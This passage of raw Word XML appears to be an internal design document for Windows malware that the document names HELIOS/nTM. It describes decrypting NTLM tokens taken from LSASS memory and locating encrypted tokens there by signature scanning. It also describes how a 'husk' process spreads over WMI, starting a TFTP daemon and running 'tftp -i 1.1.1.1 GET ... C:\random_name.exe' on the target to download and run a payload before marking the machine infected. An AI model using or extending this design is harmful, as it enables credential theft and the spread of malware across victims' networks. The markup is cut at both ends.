          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(iv),</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(PUCHAR)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>local_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>decrypted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</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NTLM_TOKEN_6_SIZE,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRPr="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>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(PULONG)&amp;junk,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pP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r>
      <w:r w:rsidRPr="006F0736">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0);</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The result decrypted buffer is stored in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>local_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decrypted_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The encryption handlers are closed and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> processes the decrypted token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc347394088"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>WMI and TFTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">When the husk process </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>recieves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a GO from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to begin infection, it reads a registry </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">key (specified in </w:t>
      </w:r>
      <w:r w:rsidR="00286BEB">
        <w:t>HELIOS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.core.dll </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>main.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) which contains an IP address of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The husk follows this procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initialize the ole32 library </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Create a server instance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Connect to the remote namespace (target machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If there is a failure, then the husk does not have access to the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If there is a success, then the husk has gained complete access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sets security permissions on the services object, notifying LSA that the WMI instance</w:t>
      </w:r>
      <w:r w:rsidR="007D6E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>has RPC_C_IMP_LEVEL_IMPERSONATE set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="1440"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Determine the remote OS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If it is Vista+, then the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exist by default. Use WMI to install the MSI through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkgmgr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Unfortunately, this process could take a few minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The husk process starts the local TFTP daemon thread. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Synchronization between the TFTP daemon thread and the husk process is maintained</w:t>
      </w:r>
      <w:r w:rsidR="007D6E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>through a CRITICAL_SECTION object.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The daemon first opens a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, which is owned by the payload downloader thread in LSASS. The payload downloader thread obtains this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> once an update occurs. When the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> thread gets a handle to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mutex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, it attempts to open a shared memory region, which will link the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LSASSnTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> thread and the husk </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subprocess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will now have the latest</w:t>
      </w:r>
      <w:r w:rsidR="007D6E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The TFTP command is executed through WMI.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1.1.1.1 GET abcde12345 C:\random_name.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>'abcde12345' is required for the download to start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="2160"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The payload will be executed through WMI and the husk will return SUCCESS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E291E" w:rsidRDefault="002E291E" w:rsidP="007D6E9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The target machine is marked as infected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc347394089"/>
      <w:r>
        <w:t>Token Structures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">The Local Security Authority Subsystem Service (LSASS) was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rigerously</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reversed</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to determine how the process handles token creation, validation and removal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D55BA" w:rsidRDefault="001D55BA" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Each token that exists in LSA memory must be encrypted, so first we must find </w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">where the encrypted pool is. The DESX-CBC keys will change upon reboot. However, </w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Windows leaves us with some excellent signatures that will find an encrypted token.</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">First, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> looks for an ASCII string 'Primary' followed by NULL, in LSASS memory.</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">There are many instances, some will not be a token. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Example encrypted token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pP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[Address]</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>[Data]</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>[Offset]</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>[Notes]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRPr="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0x00230000  0c 00 23 00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</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w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ontains a pointer to 'Primary'</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 xml:space="preserve">0x00230004  0f a2 00 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>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 xml:space="preserve">0x00230008  01 00 ff </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
